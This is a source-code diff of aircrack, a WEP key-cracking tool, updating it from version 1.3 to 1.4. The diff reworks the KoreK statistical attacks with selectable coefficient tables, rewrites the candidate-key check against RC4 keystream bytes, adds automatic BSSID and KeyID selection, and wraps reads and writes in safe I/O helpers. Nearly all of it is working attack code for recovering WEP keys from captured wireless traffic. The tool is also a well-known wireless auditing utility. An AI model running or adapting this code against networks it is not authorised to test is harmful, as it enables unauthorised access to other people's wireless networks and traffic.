@@ -32,17 +32,18 @@
 #include <time.h>
 
 #include "pcap.h"
+#include "safe_io.h"
 
-#define AMOD(x,y) ((x) % (y) < 0 ? ((x) % (y)) + (y) : (x) % (y))
 #define SWAP(x,y) { unsigned char tmp = x; x = y; y = tmp; }
 
-#define SUCCESS 0
-#define FAILURE 1
+#define SUCCESS  0
+#define FAILURE  1
+#define INFINITY 65535
 
 char usage[] =
 
 "\n"
-"  aircrack 1.3 - (C) 2004 Christophe Devine\n"
+"  aircrack 1.4 - (C) 2004 Christophe Devine\n"
 "\n"
 "  usage: %s [options] <pcap filename(s)>\n"
 "\n"
@@ -50,17 +51,18 @@ char usage[] =
 "      -d <start> : debug - specify beginning of the key\n"
 "      -f <fudge> : bruteforce fudge factor (default: 2)\n"
 "      -k <keyid> : WEP KeyID to crack (0-3, default: 0)\n"
-"      -n <nbits> : WEP key length (5 / 13, default: 13)\n"
+"      -n <nbyte> : WEP key length (5 / 13, default: 13)\n"
 "      -p <nfork> : SMP support: # of processes to start\n"
 "\n";
 
 /* command-line parameters */
 
-int is_stable = 0;              /* enhanced KoreK flag  */
-int bssid_set = 0;              /* BSSID check flag     */
 int debug_lvl = 0;              /* # of keybytes fixed  */
+int bssid_set = 0;              /* BSSID check flag     */
+int keyid_set = 0;              /* KeyID check flag     */
+int stability = 0;              /* unstable attacks on  */
+unsigned char debug[13];        /* user-defined wepkey  */
 unsigned char bssid[6];         /* user-defined BSSID   */
-unsigned char debug[13];        /* user-defined key     */
 int keyid  =  0;                /* WEP KeyID            */
 int weplen = 13;                /* WEP key length       */
 int ffact  =  2;                /* fudge threshold      */
@@ -69,7 +71,6 @@ int nfork  =  1;                /* number of forks      */
 /* runtime global data */
 
 unsigned char buffer[65536];    /* buffer for reading packets   */
-unsigned char kcheck[8][10];    /* 8 packets to verify wepkey   */
 unsigned char wepkey[13];       /* the current chosen WEP key   */
 unsigned char *ivbuf;           /* buffer for the unique IVs    */
 unsigned long nb_ivs;           /* number of elements in ivbuf  */
@@ -100,10 +101,10 @@ enum KoreK_attacks
     A_s5_1,                     /* standard      5% (~FMS)      */
     A_s5_2,                     /* other stable  5%             */
     A_s5_3,                     /* other stable  5%             */
-    A_u5_1,                     /* unstable      5%  disabled   */
-    A_u5_2,                     /* unstable      5%     "       */
-    A_u5_3,                     /* unstable      5%     "       */
-    A_u5_4,                     /* unstable      5%     "       */
+    A_u5_1,                     /* unstable      5% no good ?   */
+    A_u5_2,                     /* unstable      5%             */
+    A_u5_3,                     /* unstable      5% no good     */
+    A_u5_4,                     /* unstable      5%             */
     A_s3,                       /* stable        3%             */
     A_4_s13,                    /* stable       13% on q = 4    */
     A_4_u5_1,                   /* unstable      5% on q = 4    */
@@ -111,230 +112,15 @@ enum KoreK_attacks
     A_neg                       /* helps reject false positives */
 };
 
-int coeff_attacks__old[N_ATTACKS] =
+int coeff_attacks[4][N_ATTACKS] =
 {
-    15, 13,  0,  0,  0, 5, 5, 5, 0, 0, 0, 0, 0, 13, 0, 0, 0
+    { 15, 13, 12, 12, 12, 5, 5, 5, 3, 4, 3, 4, 3, 13, 4, 4, 0 },
+    { 15, 13, 12, 12, 12, 5, 5, 5, 0, 0, 0, 0, 3, 13, 4, 4, 0 },
+    { 15, 13,  0,  0,  0, 5, 5, 5, 0, 0, 0, 0, 0, 13, 0, 0, 0 },
+    {  0, 13,  0,  0,  0, 5, 0, 0, 0, 0, 0, 0, 0,  0, 0, 0, 0 }
 };
 
-int coeff_attacks_wide[N_ATTACKS] =
-{
-    15, 13, 12, 12, 12, 5, 5, 5, 0, 0, 0, 0, 3, 13, 5, 5, 0
-};
-
-int read_ivs( char *filename, int *nb_chk );
-int calc_votes( int child );
-int do_wep_crack( int B );
-
-/* routine that handles signals */
-
-void my_sighandler( int signum )
-{
-    if( signum == SIGTERM )
-        exit( 0 );
-
-    if( signum == SIGCHLD )
-    {
-        printf( "got unexpected SIGCHLD, exiting.\n" );
-        kill( 0, SIGTERM );
-        exit( FAILURE );
-    }
-}
-
-int main( int argc, char *argv[] )
-{
-    char *s;
-    int i, n, nb_chk, pid;
-
-    /* check the arguments */
-
-    if( argc < 2 )
-    {
-    usage:
-        printf( usage, argv[0] );
-        return( FAILURE );
-    }
-
-    while( 1 )
-    {
-        int option = getopt( argc, argv, "b:d:f:k:n:p:s" );
-
-        if( option < 0 ) break;
-
-        switch( option )
-        {
-            case 'b':
-
-                i = 0;
-                s = optarg;
-
-                while( sscanf( s, "%x", &n ) == 1 )
-                {
-                    if( n < 0 || n > 255 )
-                        goto usage;
-
-                    bssid[i] = n;
-
-                    if( ++i == 6 ) break;
-
-                    if( ! ( s = strchr( s, ':' ) ) )
-                        break;
-
-                    s++;
-                }
-
-                if( i != 6 ) goto usage;
-                bssid_set = 1;
-                break;
-
-            case 'd' :
-
-                i = 0;
-                s = optarg;
-
-                while( sscanf( s, "%x", &n ) == 1 )
-                {
-                    if( n < 0 || n > 255 )
-                        goto usage;
-
-                    debug[i] = n;
-
-                    if( ++i == 13 ) break;
-
-                    if( ! ( s = strchr( s, ':' ) ) )
-                        break;
-
-                    s++;
-                }
-
-                if( i == 0 ) goto usage;
-                debug_lvl = i;
-                break;
-
-            case 'f' :
-
-                if( sscanf( optarg, "%d", &ffact ) != 1 )
-                    goto usage;
-
-                if( ffact < 1 )
-                    goto usage;
-
-                break;
-
-            case 'k' :
-
-                if( sscanf( optarg, "%d", &keyid ) != 1 )
-                    goto usage;
-
-                if( keyid < 0 || keyid > 3 )
-                    goto usage;
-
-                break;
-
-            case 'n' :
-
-                if( sscanf( optarg, "%d", &weplen ) != 1 )
-                    goto usage;
-
-                if( weplen != 5 && weplen != 13 )
-                    goto usage;
-
-                break;
-
-            case 'p' :
-
-                if( sscanf( optarg, "%d", &nfork ) != 1 )
-                    goto usage;
-
-                if( nfork < 1 || nfork > 256 )
-                    goto usage;
-
-                break;
-
-            case 's':
-
-                is_stable = 1;
-                break;
-
-            default : goto usage;
-        }
-    }
-
-    if( ! ( argc - optind ) )
-        goto usage;
-
-    /* initialize all the data */
-
-    nb_ivs = 0;
-    nb_chk = 0;
-
-    if( ! ( ivbuf = (unsigned char *)
-                        malloc( 5 * 256 * 256 * 256 ) ) )
-    {
-        perror( "malloc" );
-        return( FAILURE );
-    }
-
-    if( ! ( test_unique_ivs = (char *)
-                                malloc( 256 * 256 * 256 ) ) )
-    {
-        perror( "malloc" );
-        return( FAILURE );
-    }
-
-    memset( test_unique_ivs, 0, 256 * 256 * 256 );
-
-    /* read the packets from each file */
-
-    while( optind != argc )
-    {
-        if( read_ivs( argv[optind], &nb_chk ) != SUCCESS )
-            return( FAILURE );
-
-        optind++;
-    }
-
-    free( test_unique_ivs );
-
-    if( nb_chk < 8 )
-    {
-        fprintf( stderr, "Could not get enought check packets!\n" );
-        return( FAILURE );
-    }
-
-    /* fork the childs */
-
-    signal( SIGTERM, SIG_IGN );
-    signal( SIGCHLD, my_sighandler );
-
-    for( i = 0; i < nfork; i++ )
-    {
-        pipe( mc_pipe[i] );
-        pipe( cm_pipe[i] );
-
-        if( ( pid = fork() ) < 0 )
-        {
-            perror( "fork" );
-            return( FAILURE );
-        }
-
-        if( ! pid )
-        {
-            signal( SIGTERM, my_sighandler );
-            return( calc_votes( i ) );
-        }
-    }
-
-    /* launch the attack */
-
-    tm_start = tm_prev = time( NULL );
-
-    printf( "\33[2J\33[2;1H" );
-    fflush( stdout );
-
-    return( do_wep_crack( 0 ) );
-}
-
-int read_ivs( char *filename, int *nb_chk )
+int read_ivs( char *filename )
 {
     int i, n, infile;
     unsigned long cnt1;
@@ -355,7 +141,7 @@ int read_ivs( char *filename, int *nb_chk )
 
     n = sizeof( struct pcap_file_header );
 
-    if( read( infile, &pfh, n ) != n )
+    if( safe_read( infile, &pfh, n ) != n )
     {
         perror( "read" );
         return( FAILURE );
@@ -397,12 +183,12 @@ int read_ivs( char *filename, int *nb_chk )
 
         n = sizeof( pkh );
 
-        if( read( infile, &pkh, n ) != n )
+        if( safe_read( infile, &pkh, n ) != n )
             break;
 
         n = pkh.len;
 
-        if( read( infile, buffer, n ) != n )
+        if( safe_read( infile, buffer, n ) != n )
             break;
 
         cnt1++;
@@ -414,13 +200,11 @@ int read_ivs( char *filename, int *nb_chk )
             /* remove the prism header if necessary */
 
             n = *(int *)( h80211 + 4 );
-            h80211 += n; pkh.len -= n;
 
-            if( pkh.len <= 0 )
-            {
-                fprintf( stderr, "\nFIXME: wrong prism header size ?\n" );
+            if( n < 8 || n >= (int) pkh.len )
                 continue;
-            }
+
+            h80211 += n; pkh.len -= n;
         }
 
         /* minimum encrypted data packet size: 40 = 24  *
@@ -433,11 +217,7 @@ int read_ivs( char *filename, int *nb_chk )
         if( ( h80211[0] & 0x0C ) != 0x08 ) continue;
         if( ( h80211[1] & 0x40 ) != 0x40 ) continue;
 
-        /* is it the correct keyid ? */
-
-        if( ( h80211[27] >> 6 ) != keyid ) continue;
-
-        /* check if the bssids match */
+        /* check if the BSSID and the KeyID match */
 
         switch( h80211[1] & 3 )
         {
@@ -447,59 +227,47 @@ int read_ivs( char *filename, int *nb_chk )
             default: i =  4; break;      /* RA, TA, DA, SA */
         }
 
-        if( ! bssid_set )
+        if( bssid_set == 0 )
         {
+            bssid_set = 1;
             memcpy( bssid, h80211 + i, 6 );
 
+            if( keyid_set == 0 )
+            {
+                keyid_set = 1;
+                keyid = h80211[27] >> 6;
+            }
+                
             printf( "\33[2KChoosing first encrypted BSSID"
-                    " = %02X:%02X:%02X:%02X:%02X:%02X\n",
+                    " = %02X:%02X:%02X:%02X:%02X:%02X (KeyID %d)\n",
                     bssid[0], bssid[1], bssid[2],
-                    bssid[3], bssid[4], bssid[5] );
-
-            bssid_set = 1;
+                    bssid[3], bssid[4], bssid[5], keyid );
         }
         else
             if( memcmp( bssid, h80211 + i, 6 ) )
                 continue;
 
+        if( keyid_set )
+            if( ( h80211[27] >> 6 ) != keyid )
+                continue;
+
         /* have we already seen this IV ? */
 
-        n = ( h80211[24] << 16 )
-          | ( h80211[25] <<  8 )
-          | ( h80211[26]       );
+        n =   h80211[24]
+          + ( h80211[25] <<  8 )
+          + ( h80211[26] << 16 );
 
         if( test_unique_ivs[n] ) continue;
 
         test_unique_ivs[n] = 1;
 
-        if( *nb_chk < 8 )
-        {
-            /* this packet's first bytes will be used to check *
-             * if the current chosen WEP key is the valid one  */
-
-            memcpy( kcheck[*nb_chk], h80211 + 24, 10 );
-
-            kcheck[*nb_chk][4] ^= 0xAA;
-            kcheck[*nb_chk][5] ^= 0xAA;
-            kcheck[*nb_chk][6] ^= 0x03;
-/*
-            kcheck[*nb_chk][7] ^= 0x00;
-            kcheck[*nb_chk][8] ^= 0x00;
-            kcheck[*nb_chk][9] ^= 0x00;
-*/
-            (*nb_chk)++;
-        }
-
-        /* might be a weak IV for keybyte B, so add it */
+        /* nope, add this IV and the first two encrypted bytes */
 
         ivbuf[nb_ivs * 5    ] = h80211[24];
         ivbuf[nb_ivs * 5 + 1] = h80211[25];
         ivbuf[nb_ivs * 5 + 2] = h80211[26];
-
-        /* also add the first two bytes of RC4's output */
-
-        ivbuf[nb_ivs * 5 + 3] = h80211[28] ^ 0xAA;
-        ivbuf[nb_ivs * 5 + 4] = h80211[29] ^ 0xAA;
+        ivbuf[nb_ivs * 5 + 3] = h80211[28];
+        ivbuf[nb_ivs * 5 + 4] = h80211[29];
 
         cnt2++; nb_ivs++;
     }
@@ -510,46 +278,6 @@ int read_ivs( char *filename, int *nb_chk )
     return( SUCCESS );
 }
 
-/* this routine sets up the key schedule using wepkey and *
- * each 8 packets IV, then checks if RC4's output matches */
-
-int check_wepkey( void )
-{
-    unsigned char S[256], K[16];
-    int ntest, i, j, d, dmask;
-
-    dmask = 3 + weplen - 1;
-
-    memcpy( K + 3, wepkey, weplen );
-
-    for( ntest = 0; ntest < 8; ntest++ )
-    {
-        for( i = 0; i < 256; i++ )
-            S[i] = i;
-
-        memcpy( K, kcheck[ntest], 3 );
-
-        for( i = j = d = 0; i < 256; i++ )
-        {
-            j = ( j + S[i] + K[d]) & 0xFF;
-            SWAP( S[i], S[j] );
-            d++; d &= dmask;
-        }
-
-        for( i = 1, j = 0; i < 7; i++ )
-        {
-            j = ( j + S[i] ) & 0xFF;
-            SWAP(S[i], S[j]);
-
-            if( S[(S[i] + S[j]) & 0xFF] !=
-                kcheck[ntest][3 + i] )
-                return( FAILURE );
-        }
-    }
-
-    return( SUCCESS );
-}
-
 /* this routine displays a bunch of statistical   *
  * data about the current state of the FMS attack */
 
@@ -574,11 +302,11 @@ void show_stats( int B )
     et_m = ( delta - et_h * 3600 ) / 60;
     et_s =   delta - et_h * 3600 - et_m * 60;
 
-    printf( "\33[2;%dH\33[1maircrack 1.3\33[0m\n\n",
+    printf( "\33[2;%dH\33[1maircrack 1.4\33[0m\n\n",
             ( ws.ws_col - 12 ) / 2 ); 
 
-    printf( "   * Got %8ld unique IVs | fudge factor = %d\n",
-            nb_ivs, ffact );
+    printf( "   * Got %7ld%c unique IVs | fudge factor = %d\n",
+            nb_ivs, ( nb_ivs < 786432 ) ? '!' : ' ', ffact );
 
     printf( "   * Elapsed time [%02d:%02d:%02d] | tried "
             "%ld keys at %ld k/m\n", et_h, et_m, et_s, tried,
@@ -597,16 +325,20 @@ void show_stats( int B )
         {
             if( j >= 256 ) break;
 
-            printf( "%02X(%4d) ", wpoll[i][j].index,
-                                  wpoll[i][j].votes );
+            if( wpoll[i][j].votes == INFINITY )
+                printf( "%02X(+inf) ", wpoll[i][j].index );
+            else
+                printf( "%02X(%4d) ",  wpoll[i][j].index,
+                                       wpoll[i][j].votes );
         }
 
         printf( "\n" );
     }
 
-    printf( "\33[J\n" );
+    if( B < 11 )
+        printf( "\33[J" );
 
-    fflush( stdout );
+    printf( "\n" );
 }
 
 /* each child performs the attacks over nb_ivs / nfork */
@@ -624,8 +356,6 @@ int calc_votes( int child )
 
     int i, j, B, votes[N_ATTACKS][256];
 
-    signal( SIGTERM, my_sighandler );
-
     min = 5 * ( ( (     child ) * nb_ivs ) / nfork );
     max = 5 * ( ( ( 1 + child ) * nb_ivs ) / nfork );
 
@@ -634,17 +364,17 @@ int calc_votes( int child )
 
 wait_for_master:
 
-    if( read( mc_pipe[child][0], buffer, 14 ) != 14 )
+    if( safe_read( mc_pipe[child][0], buffer, 14 ) != 14 )
     {
-        if( errno == EINTR ) goto wait_for_master;
         perror( "in calc_votes: read()" );
         return( FAILURE );
     }
 
     B = (int) buffer[0];
+    q = 3 + B;
+
     memcpy( K + 3, buffer + 1, 13 );
     memset( votes, 0, sizeof( votes ) );
-    q = 3 + B;
 
     /*
      *                        JABBERWOCKY
@@ -690,8 +420,8 @@ wait_for_master:
 
         i = q; do { i--; SWAP(Si[i],Si[jj[i]]); } while( i != 0 );
 
-        o1 = ivbuf[xv + 3]; io1 = Si[o1]; S1 = S[1];
-        o2 = ivbuf[xv + 4]; io2 = Si[o2]; S2 = S[2];
+        o1 = ivbuf[xv + 3] ^ 0xAA; io1 = Si[o1]; S1 = S[1];
+        o2 = ivbuf[xv + 4] ^ 0xAA; io2 = Si[o2]; S2 = S[2];
         Sq = S[q]; dq = Sq + jj[q - 1];
 
         if( S2 == 0 )
@@ -876,12 +606,9 @@ wait_for_master:
         }
     }
 
-retry_cm_write:
-
-    if( write( cm_pipe[child][1], votes, sizeof( votes ) ) !=
-                                         sizeof( votes ) )
+    if( safe_write( cm_pipe[child][1], votes, sizeof( votes ) ) !=
+                                              sizeof( votes ) )
     {
-        if( errno == EINTR ) goto retry_cm_write;
         perror( "in calc_votes: write()" );
         return( FAILURE );
     }
@@ -889,6 +616,54 @@ retry_cm_write:
     goto wait_for_master;
 }
 
+/* routine that tests if a potential key is valid */
+
+int check_wepkey( void )
+{
+    unsigned char K[16];
+    unsigned char S[256];
+    unsigned char R[256];
+    unsigned char x1, x2;
+    unsigned long xv;
+    int i, j, n, match;
+
+    match = 0;
+
+    memcpy( K + 3, wepkey, weplen );
+
+    for( i = 0; i < 256; i++ )
+        R[i] = i;
+
+    for( n = 0; n < 8; n++ )
+    {
+        xv = 5 * ( rand() % nb_ivs );
+
+        memcpy( K, &ivbuf[xv], 3 );
+        memcpy( S, R, 256 );
+
+        for( i = j = 0; i < 256; i++ )
+        {
+            j = ( j + S[i] + K[i & (2 + weplen)]) & 0xFF;
+            SWAP( S[i], S[j] );
+        }
+
+        i = 1; j = ( 0 + S[i] ) & 0xFF; SWAP(S[i], S[j]);
+        x1 = ivbuf[xv + 3] ^ S[(S[i] + S[j]) & 0xFF];
+
+        i = 2; j = ( j + S[i] ) & 0xFF; SWAP(S[i], S[j]);
+        x2 = ivbuf[xv + 4] ^ S[(S[i] + S[j]) & 0xFF];
+
+        if( ( x1 == 0xAA && x2 == 0xAA ) ||
+            ( x1 == 0xE0 && x2 == 0xE0 ) )
+            match++;
+    }
+
+    if( match >= 4 )
+        return( SUCCESS );
+
+    return( FAILURE );
+}
+
 /* routine used to sort the votes */
 
 int cmp_votes( const void *bs1, const void *bs2 )
@@ -926,11 +701,8 @@ int do_wep_crack( int B )
 
     for( child = 0; child < nfork; child++ )
     {
-    retry_mc_write:
-
-        if( write( mc_pipe[child][1], buffer, 14 ) != 14 )
+        if( safe_write( mc_pipe[child][1], buffer, 14 ) != 14 )
         {
-            if( errno == EINTR ) goto retry_mc_write;
             perror( "in do_wep_crack: write()" );
             return( FAILURE );
         }
@@ -940,12 +712,9 @@ int do_wep_crack( int B )
 
     for( child = 0; child < nfork; child++ )
     {
-    retry_cm_read:
-
-        if( read( cm_pipe[child][0], buffer, sizeof( votes ) ) !=
-                                             sizeof( votes ) )
+        if( safe_read( cm_pipe[child][0], buffer, sizeof( votes ) ) !=
+                                                  sizeof( votes ) )
         {
-            if( errno == EINTR ) goto retry_cm_read;
             perror( "in do_wep_crack: read()" );
             return( FAILURE );
         }
@@ -962,19 +731,18 @@ int do_wep_crack( int B )
     for( i = 0; i < 256; i++ )
     {
         for( n = 0; n < N_ATTACKS; n++ )
-            wpoll[B][i].votes +=
-                ( ( is_stable )
-                  ? ( coeff_attacks__old[n] * votes[n][i] )
-                  : ( coeff_attacks_wide[n] * votes[n][i] ) );
+        {
+            wpoll[B][i].votes += coeff_attacks[stability][n] *
+                                 votes[n][i];
+        }
 
-        if( votes[A_neg][i] > 2 + (int) ( nb_ivs / 524288 ) )
-            wpoll[B][i].votes = -1;
+        wpoll[B][i].votes -= 20 * votes[A_neg][i];
     }
 
     /* set votes to the max if keybyte is user-defined */
 
     if( B < debug_lvl )
-        wpoll[B][debug[B]].votes = 999;
+        wpoll[B][debug[B]].votes = INFINITY;
 
     /* sort the votes, highest ones first */
 
@@ -990,6 +758,9 @@ int do_wep_crack( int B )
 
     for( depth[B] = 0; depth[B] < fudge[B]; depth[B]++ )
     {
+        if( B == weplen - 1 )
+            tried++;
+
         wepkey[B] = wpoll[B][depth[B]].index;
 
         show_stats( B );
@@ -1015,8 +786,6 @@ int do_wep_crack( int B )
         {
             /* last keybyte reached, so check if wepkey is valid */
 
-            tried++;
-
             if( check_wepkey() == SUCCESS )
             {
             keyfound:
@@ -1049,3 +818,225 @@ int do_wep_crack( int B )
 
     return( FAILURE );
 }
+
+/* routine that handles signals */
+
+void my_sighandler( int signum )
+{
+    if( signum == SIGTERM )
+    {
+        sleep( 1 );
+        exit( 0 );
+    }
+
+    if( signum == SIGCHLD )
+    {
+        printf( "got unexpected SIGCHLD, exiting.\n" );
+        kill( 0, SIGTERM );
+        exit( FAILURE );
+    }
+}
+
+/* program entry point */
+
+int main( int argc, char *argv[] )
+{
+    char *s;
+    int i, n, pid;
+
+    /* check the arguments */
+
+    if( argc < 2 )
+    {
+    usage:
+        printf( usage, argv[0] );
+        return( FAILURE );
+    }
+
+    while( 1 )
+    {
+        int option = getopt( argc, argv, "b:d:f:k:n:p:s:" );
+
+        if( option < 0 ) break;
+
+        switch( option )
+        {
+            case 'b':
+
+                i = 0;
+                s = optarg;
+
+                while( sscanf( s, "%x", &n ) == 1 )
+                {
+                    if( n < 0 || n > 255 )
+                        goto usage;
+
+                    bssid[i] = n;
+
+                    if( ++i == 6 ) break;
+
+                    if( ! ( s = strchr( s, ':' ) ) )
+                        break;
+
+                    s++;
+                }
+
+                if( i != 6 ) goto usage;
+                bssid_set = 1;
+                break;
+
+            case 'd' :
+
+                i = 0;
+                s = optarg;
+
+                while( sscanf( s, "%x", &n ) == 1 )
+                {
+                    if( n < 0 || n > 255 )
+                        goto usage;
+
+                    debug[i] = n;
+
+                    if( ++i == 13 ) break;
+
+                    if( ! ( s = strchr( s, ':' ) ) )
+                        break;
+
+                    s++;
+                }
+
+                if( i == 0 ) goto usage;
+                debug_lvl = i;
+                break;
+
+            case 'f' :
+
+                if( sscanf( optarg, "%d", &ffact ) != 1 )
+                    goto usage;
+
+                if( ffact < 1 )
+                    goto usage;
+
+                break;
+
+            case 'k' :
+
+                if( sscanf( optarg, "%d", &keyid ) != 1 )
+                    goto usage;
+
+                if( keyid < 0 || keyid > 3 )
+                    goto usage;
+
+                keyid_set = 1;
+                break;
+
+            case 'n' :
+
+                if( sscanf( optarg, "%d", &weplen ) != 1 )
+                    goto usage;
+
+                if( weplen != 5 && weplen != 13 )
+                    goto usage;
+
+                break;
+
+            case 'p' :
+
+                if( sscanf( optarg, "%d", &nfork ) != 1 )
+                    goto usage;
+
+                if( nfork < 1 || nfork > 256 )
+                    goto usage;
+
+                break;
+
+            case 's':
+
+                if( sscanf( optarg, "%d", &stability ) != 1 )
+                    goto usage;
+
+                if( stability < 0 || stability > 3 )
+                    goto usage;
+
+                break;
+
+            default : goto usage;
+        }
+    }
+
+    if( ! ( argc - optind ) )
+        goto usage;
+
+    /* initialize all the data */
+
+    nb_ivs = 0;
+
+    if( ! ( ivbuf = (unsigned char *)
+                        malloc( 5 * 256 * 256 * 256 ) ) )
+    {
+        perror( "malloc" );
+        return( FAILURE );
+    }
+
+    if( ! ( test_unique_ivs = (char *)
+                        malloc( 256 * 256 * 256 ) ) )
+    {
+        perror( "malloc" );
+        return( FAILURE );
+    }
+
+    memset( test_unique_ivs, 0, 256 * 256 * 256 );
+
+    /* read the packets from each file */
+
+    while( optind != argc )
+    {
+        if( read_ivs( argv[optind] ) != SUCCESS )
+            return( FAILURE );
+
+        optind++;
+    }
+
+    free( test_unique_ivs );
+
+    if( nb_ivs < 8 )
+    {
+        printf( "Not enough IVs, exiting.\n" );
+        return( 1 );
+    }
+
+    /* fork the children */
+
+    signal( SIGTERM, SIG_IGN );
+    signal( SIGCHLD, my_sighandler );
+
+    for( i = 0; i < nfork; i++ )
+    {
+        pipe( mc_pipe[i] );
+        pipe( cm_pipe[i] );
+
+        if( ( pid = fork() ) < 0 )
+        {
+            perror( "fork" );
+            return( FAILURE );
+        }
+
+        if( ! pid )
+        {
+            signal( SIGTERM, my_sighandler );
+            return( calc_votes( i ) );
+        }
+    }
+
+    /* launch the attack */
+
+    srand( time( NULL ) );
+
+    tm_start = time( NULL );
+    tm_prev  = time( NULL );
+
+    printf( "\33[2J" );
+    fflush( stdout );
+
+    return( do_wep_crack( 0 ) );
+}
